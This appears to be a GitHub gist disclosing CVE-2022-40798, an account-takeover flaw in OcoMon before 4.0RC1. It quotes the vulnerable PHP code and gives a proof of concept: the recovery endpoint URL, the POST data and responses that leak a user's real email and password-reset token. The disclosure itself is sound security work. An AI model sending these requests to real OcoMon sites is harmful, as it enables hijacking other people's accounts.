

Instantly share code, notes, and snippets.

ninj4c0d3r / ocomon-account-takeover.md

Last active last month

☆ Star

<> Code -○ Revisions 2

CVE-2022-40798 - OcoMon Account Takeover

oocomon-account-takeover.md

OcoMon < 4.0RC1 - Account Takeover [CVE-2022-40798]

Description

Through password recovery its possible to obtain a **token** to reset password of any user.

Bug - 1

The vulnerability occurs because the application validates the email in database and returns the real email to the user.

```
if (!empty($data['login_name'])) {
    $sql = "SELECT user_id, nome, email FROM usuarios WHERE login = :user ";
    $res = $conn->prepare($sql);
    $res->bindParam(':user', $data['login_name']);
    $res->execute();

    if (!$res->rowCount()) {
        $data['success'] = false;
        $data['field_id'] = 'login_name';
        $data['message'] = message('warning', 'Oops!', TRANS('USERNAME_OR_EMAIL_NOT_FOUND'), '');
        echo json_encode($data);
        return false;
    }
    $userData = $res->fetch();
    $data['user_id'] = $userData['user_id'];
    $data['name'] = $userData['nome'];
    $data['mail_to'] = $userData['email'];
}
```

Bug - 2

If username and email are valid, the application returns to user the link to reset the password instead of sending it by email.

```
$VARS = array();  
$VARS['%usuario%'] = explode(' ', $data['name'])[0];  
$VARS['%site%'] = "<a href='" . $row_config['conf_ocomon_site'] .  
$VARS['%forget_link%'] = $data['forget_link'];
```

PoC

- Access "Esqueci minha senha:

The image shows two side-by-side screenshots of the OcoMon application interface. The left screenshot shows the login page with fields for 'Usuário' and 'Senha', a 'Memorizar meu nome de usuário' checkbox, and a link for 'Esqueci minha senha'. The right screenshot shows the password recovery page titled 'Solicitação de recuperação de acesso', which asks the user to provide their username or email. It includes input fields for 'Nome de usuário' and 'E-mail', and buttons for 'CONFIRMAR' and 'CANCELAR'.

- Enter a valid username (**example: admin**) and a fake email.
- The user's real email will be exposed in the response:



Alteração de senha de acesso

Nova senha:

Repita a nova senha

CONFIRMAR

Examples:

URL: `https://ocomon.site/includes/common/require_access_recovery_process.php`

DATA:

`csrf=qgBhHao%2BUlza4vm2VFTQZYs7V8A%3D&csrf_session_key=csrf_token&login_name=admin&`

RESPONSE:

`"action":"require_recovery","field_id":"email","login_name":"admin","email":"anythin
do Sistema","mail_to":"realemail@email.com"}`



URL: `https://ocomon.site/includes/common/require_access_recovery_process.php`

DATA:

`csrf=qgBhHao%2BUlza4vm2VFTQZYs7V8A%3D&csrf_session_key=csrf_token&login_name=admin&`

RESPONSE:

`"action":"require_recovery","field_id":"","login_name":"admin","email":"realemail@em
do
Sistema","mail_to":"realemail@email.com","rand":"b39abfbd697e566d178e678462b0b6c1","
code=1|b39abfbd697e566d178e678462b0b6c1"}`



FIX

<https://ocomonphp.sourceforge.io/downloads/>